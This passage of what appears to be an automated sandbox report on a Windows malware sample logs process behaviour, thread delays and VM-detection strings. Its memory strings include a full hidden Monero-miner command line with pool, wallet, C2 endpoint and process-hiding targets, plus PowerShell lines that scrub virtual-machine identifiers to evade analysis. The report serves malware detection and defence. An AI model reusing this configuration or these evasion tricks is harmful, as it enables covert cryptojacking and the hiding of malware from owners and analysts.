                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\dialer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\dialer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\dialer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\wbem\WMIADAP.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\wbem\WMIADAP.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\wbem\WMIADAP.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Contains functionality to compare user and computer (likely to detect sandboxes)
                      Source: C:\Windows\System32\dialer.exeCode function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,FindCloseChangeNotification,CloseHandle,17_2_00000001400010C0
                      Source: C:\Windows\System32\dialer.exeCode function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,FindCloseChangeNotification,CloseHandle,44_2_00000001400010C0
                      Query firmware table information (likely to detect VMs)
                      Source: C:\Windows\System32\dialer.exeSystem information queried: FirmwareTableInformation
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Source: dialer.exe, 0000002F.00000003.2470280295.0000025545EAD000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 0000002F.00000003.3053963293.0000025545EA9000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 0000002F.00000002.3605895268.0000025545EAE000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 0000002F.00000003.3054668059.0000025545EAD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE
                      Source: dialer.exe, 0000002F.00000003.2470280295.0000025545EAD000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 0000002F.00000003.3053963293.0000025545EA9000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 0000002F.00000002.3605895268.0000025545EAE000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 0000002F.00000003.3054668059.0000025545EAD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXEC
                      Source: dialer.exe, 0000002F.00000002.3603906840.0000025545E25000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DIALER.EXE--ALGO=RX/0--URL=GULF.MONEROOCEAN.STREAM:10128--USER=4AXNHSYV9A9EMWEHMN6IGQ1ERJGJFGYEBCSX3AZG7AFHQU9CMGFQF77CRFPNFHPUN6HCVKWS4NTOYRXKFSBKFH8P7E5XSLU--PASS=--CPU-MAX-THREADS-HINT=40--CINIT-WINRING=VOEEOIQRJNLA.SYS--CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE,PORTMASTER-START.EXE--CINIT-API=HTTPS://WEA9UFGH438790ATRHJWIUJNGZHE4WA709RTHJCWA9NV8N980AVW.ROAST247.EU.ORG/API/ENDPOINT.PHP--CINIT-VERSION=3.4.0--CINIT-IDLE-WAIT=5--CINIT-IDLE-CPU=100--CINIT-ID=CWZYHCJPGGLTBMJX
                      Source: dialer.exe, 0000002F.00000002.3603906840.0000025545E25000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE,PORTMASTER-START.EXE8
                      Source: dialer.exe, 0000002F.00000003.2470280295.0000025545EAD000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 0000002F.00000003.3053963293.0000025545EA9000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 0000002F.00000002.3605895268.0000025545EAE000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 0000002F.00000003.3054668059.0000025545EAD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE,PORTMASTER-START.EXEX
                      Source: dialer.exe, 0000002F.00000002.3603906840.0000025545E25000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 0000002F.00000003.2470280295.0000025545EAD000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 0000002F.00000003.3053963293.0000025545EA9000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 0000002F.00000002.3605895268.0000025545EAE000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 0000002F.00000003.3054668059.0000025545EAD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE,PORTMASTER-START.EXE
                      Source: dialer.exe, 0000002F.00000002.3603906840.0000025545E25000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: T=40 --CINIT-WINRING="VOEEOIQRJNLA.SYS" --CINIT-STEALTH-TARGETS="TASKMGR.EXE,PROCESSHACKER.EXE,P
                      Source: dialer.exe, 0000002F.00000002.3603906840.0000025545E25000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE,PORTMASTER-START.EXE
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeMemory allocated: 24D0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeMemory allocated: 1A6B0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeWindow / User API: threadDelayed 5847Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeWindow / User API: threadDelayed 3951Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6046Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3635Jump to behavior
                      Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 8444
                      Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 1554
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6952
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2607
                      Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 9965
                      Source: C:\Windows\System32\dwm.exeWindow / User API: threadDelayed 9866
                      Source: C:\Windows\System32\dialer.exeWindow / User API: threadDelayed 1799
                      Source: C:\Windows\System32\dialer.exeWindow / User API: threadDelayed 482
                      Source: C:\Windows\System32\wbem\WMIADAP.exeWindow / User API: threadDelayed 1822
                      Source: C:\Windows\System32\wbem\WMIADAP.exeWindow / User API: threadDelayed 834
                      Source: C:\ProgramData\Google\Chrome\updater.exeDropped PE file which has not been started: C:\Windows\Temp\voeeoiqrjnla.sysJump to dropped file
                      Source: C:\Windows\System32\lsass.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_31-14949
                      Source: C:\Windows\System32\svchost.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_32-14927
                      Source: C:\Windows\System32\dialer.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_17-480
                      Source: C:\Windows\SysWOW64\system64x.exeAPI coverage: 3.7 %
                      Source: C:\ProgramData\Google\Chrome\updater.exeAPI coverage: 3.0 %
                      Source: C:\Windows\System32\lsass.exeAPI coverage: 6.6 %
                      Source: C:\Windows\System32\svchost.exeAPI coverage: 5.1 %
                      Source: C:\Windows\System32\dialer.exeAPI coverage: 1.1 %
                      Source: C:\Windows\System32\svchost.exeAPI coverage: 4.8 %
                      Source: C:\Windows\System32\svchost.exeAPI coverage: 5.1 %
                      Source: C:\Windows\System32\svchost.exeAPI coverage: 5.1 %
                      Source: C:\Windows\System32\svchost.exeAPI coverage: 8.2 %
                      Source: C:\Windows\System32\svchost.exeAPI coverage: 4.5 %
                      Source: C:\Windows\System32\wbem\WMIADAP.exeAPI coverage: 7.9 %
                      Source: C:\Windows\System32\svchost.exeAPI coverage: 4.8 %
                      Source: C:\Windows\System32\svchost.exeAPI coverage: 5.1 %
                      Source: C:\Windows\System32\svchost.exeAPI coverage: 4.5 %
                      Source: C:\Windows\System32\svchost.exeAPI coverage: 5.1 %
                      Source: C:\Windows\System32\svchost.exeAPI coverage: 5.1 %
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe TID: 1680Thread sleep time: -11068046444225724s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\system64x.exe TID: 1720Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 576Thread sleep count: 6046 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5680Thread sleep count: 3635 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3680Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                      Source: C:\Windows\System32\winlogon.exe TID: 7400Thread sleep count: 8444 > 30
                      Source: C:\Windows\System32\winlogon.exe TID: 7400Thread sleep time: -8444000s >= -30000s
                      Source: C:\Windows\System32\winlogon.exe TID: 7400Thread sleep count: 1554 > 30
                      Source: C:\Windows\System32\winlogon.exe TID: 7400Thread sleep time: -1554000s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7460Thread sleep count: 6952 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7460Thread sleep count: 2607 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7492Thread sleep time: -7378697629483816s >= -30000s
                      Source: C:\Windows\System32\lsass.exe TID: 7516Thread sleep count: 9965 > 30
                      Source: C:\Windows\System32\lsass.exe TID: 7516Thread sleep time: -9965000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 7524Thread sleep count: 247 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 7524Thread sleep time: -247000s >= -30000s
                      Source: C:\Windows\System32\dwm.exe TID: 7852Thread sleep count: 9866 > 30
                      Source: C:\Windows\System32\dwm.exe TID: 7852Thread sleep time: -9866000s >= -30000s
                      Source: C:\Windows\System32\dialer.exe TID: 7676Thread sleep count: 1799 > 30
                      Source: C:\Windows\System32\dialer.exe TID: 7676Thread sleep time: -179900s >= -30000s
                      Source: C:\Windows\System32\dialer.exe TID: 7808Thread sleep count: 482 > 30
                      Source: C:\Windows\System32\dialer.exe TID: 7808Thread sleep time: -48200s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 7864Thread sleep count: 252 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 7864Thread sleep time: -252000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 7892Thread sleep count: 253 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 7892Thread sleep time: -253000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 7908Thread sleep count: 87 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 7908Thread sleep time: -87000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 7916Thread sleep count: 241 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 7916Thread sleep time: -241000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 7960Thread sleep count: 200 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 7960Thread sleep time: -200000s >= -30000s
                      Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 7924Thread sleep count: 1822 > 30
                      Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 7392Thread sleep count: 162 > 30
                      Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 7392Thread sleep time: -162000s >= -30000s
                      Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 7924Thread sleep count: 834 > 30
                      Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 7924Thread sleep count: 218 > 30
                      Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 7924Thread sleep count: 134 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 7968Thread sleep count: 251 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 7968Thread sleep time: -251000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 7984Thread sleep count: 239 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 7984Thread sleep time: -239000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 7992Thread sleep count: 245 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 7992Thread sleep time: -245000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 8000Thread sleep count: 246 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 8000Thread sleep time: -246000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 8016Thread sleep count: 253 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 8016Thread sleep time: -253000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 8028Thread sleep count: 241 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 8028Thread sleep time: -241000s >= -30000s
                      Source: C:\Windows\System32\dialer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                      Source: C:\Windows\System32\dialer.exeLast function: Thread delayed
                      Source: C:\Windows\System32\dialer.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\winlogon.exeLast function: Thread delayed
                      Source: C:\Windows\System32\winlogon.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
                      Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\dialer.exeLast function: Thread delayed
                      Source: C:\Windows\System32\dialer.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\wbem\WMIADAP.exeLast function: Thread delayed
                      Source: C:\Windows\System32\wbem\WMIADAP.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000001E85898DCE0 FindFirstFileExW,22_2_000001E85898DCE0
                      Source: C:\Windows\System32\lsass.exeCode function: 31_2_00000140AE86DCE0 FindFirstFileExW,31_2_00000140AE86DCE0
                      Source: C:\Windows\System32\svchost.exeCode function: 32_2_00000195DD5CDCE0 FindFirstFileExW,32_2_00000195DD5CDCE0
                      Source: C:\Windows\System32\dwm.exeCode function: 33_2_000001160CA9DCE0 FindFirstFileExW,33_2_000001160CA9DCE0
                      Source: C:\Windows\System32\svchost.exeCode function: 48_2_00000257E10ADCE0 FindFirstFileExW,48_2_00000257E10ADCE0
                      Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001F28C93DCE0 FindFirstFileExW,49_2_000001F28C93DCE0
                      Source: C:\Windows\System32\svchost.exeCode function: 50_2_000001CA9854DCE0 FindFirstFileExW,50_2_000001CA9854DCE0
                      Source: C:\Windows\System32\svchost.exeCode function: 51_2_000001D26531DCE0 FindFirstFileExW,51_2_000001D26531DCE0
                      Source: C:\Windows\System32\svchost.exeCode function: 52_2_00000254A27DDCE0 FindFirstFileExW,52_2_00000254A27DDCE0
                      Source: C:\Windows\System32\wbem\WMIADAP.exeCode function: 53_2_0000028708E6DCE0 FindFirstFileExW,53_2_0000028708E6DCE0
                      Source: C:\Windows\System32\svchost.exeCode function: 54_2_0000024B87DDDCE0 FindFirstFileExW,54_2_0000024B87DDDCE0
                      Source: C:\Windows\System32\svchost.exeCode function: 55_2_00000205FD40DCE0 FindFirstFileExW,55_2_00000205FD40DCE0
                      Source: C:\Windows\System32\svchost.exeCode function: 56_2_000001A2056ADCE0 FindFirstFileExW,56_2_000001A2056ADCE0
                      Source: C:\Windows\System32\svchost.exeCode function: 57_2_0000018EC1F6DCE0 FindFirstFileExW,57_2_0000018EC1F6DCE0
                      Source: C:\Windows\System32\svchost.exeCode function: 58_2_0000025CE3E0DCE0 FindFirstFileExW,58_2_0000025CE3E0DCE0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: svchost.exe, 00000037.00000003.2529787364.00000205FBEAE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk 2.0 6000c292b65879ff477a6af604113f58PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
                      Source: svchost.exe, 00000037.00000003.2520498688.00000205FBA12000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk2.06000c292b65879ff477a6af604113f58PCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
                      Source: svchost.exe, 00000037.00000002.3596780543.00000205FAC2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000037.00000000.2494846918.00000205FAC2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @Microsoft-Windows-Hyper-V-Hypervisor
                      Source: lsass.exe, 0000001F.00000000.2415028963.00000140AD88B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicvssNT SERVICE
                      Source: svchost.exe, 00000037.00000000.2497015931.00000205FB943000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
                      Source: svchost.exe, 00000037.00000002.3620440164.00000205FBD08000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>ND
                      Source: svchost.exe, 00000034.00000000.2470028024.00000254A202B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
                      Source: svchost.exe, 00000037.00000000.2497015931.00000205FB943000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWarVMware SATA CD00
                      Source: svchost.exe, 00000037.00000000.2497015931.00000205FB943000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: LSI_SASVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
                      Source: dialer.exe, 0000002F.00000002.3603906840.0000025545DE9000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 0000002F.00000002.3603906840.0000025545E42000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: svchost.exe, 00000037.00000000.2497360390.00000205FBA00000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a8
                      Source: dwm.exe, 00000021.00000000.2434430790.0000011607ED0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: PointVMware&P
                      Source: dwm.exe, 00000021.00000000.2434430790.0000011607ED0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000=
                      Source: svchost.exe, 00000037.00000003.2520498688.00000205FBA12000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
                      Source: svchost.exe, 00000037.00000000.2497015931.00000205FB943000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: storahciNECVMWarVMware SATA CD00
                      Source: svchost.exe, 00000037.00000003.2529787364.00000205FBEAE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk 2.0 6000c2942fce4d06663969f532e45d1aPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
                      Source: svchost.exe, 00000037.00000000.2497360390.00000205FBA00000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1ap
                      Source: svchost.exe, 00000037.00000002.3595768053.00000205FABD0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware Virtual disk", $value).replace("VMware", $value).replace("HARDDISK", "WDC").replace("VIRTUAL_DISK", $value)
                      Source: svchost.exe, 00000037.00000000.2497015931.00000205FB943000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: LSI_SASVMware Virtual disk 6000c292b65879ff477a6af604113f58
                      Source: lsass.exe, 0000001F.00000000.2414749450.00000140AD813000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000002.3596610784.00000140AD813000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000000.2427096829.00000195DD613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000002.3594547345.00000195DD613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2458947467.000001F28C22B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.3595744718.000001F28C22B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000032.00000000.2461762289.000001CA9782A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000032.00000002.3592602441.000001CA9782A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000000.2470113786.00000254A2043000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.3596359189.00000254A2043000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000037.00000002.3596780543.00000205FAC2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: dwm.exe, 00000021.00000000.2434430790.0000011607ED0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
                      Source: svchost.exe, 00000037.00000000.2494975014.00000205FAC96000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMCI: Using capabilities (0x1c).
                      Source: lsass.exe, 0000001F.00000000.2415028963.00000140AD88B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicshutdownNT SERVICE
                      Source: svchost.exe, 00000037.00000002.3595768053.00000205FABD0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $value = $pr.Value.replace("VEN_80EE", $value).replace("VEN_15AD", $value).replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("82801FB", $value).replace("82441FX", $value).replace("82371SB", $value).replace("OpenHCD", $value).replace("VMWare", $value).replace("VMware", $value)
                      Source: svchost.exe, 00000037.00000000.2497360390.00000205FBA00000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk6000c292b65879ff477a6af604113f588
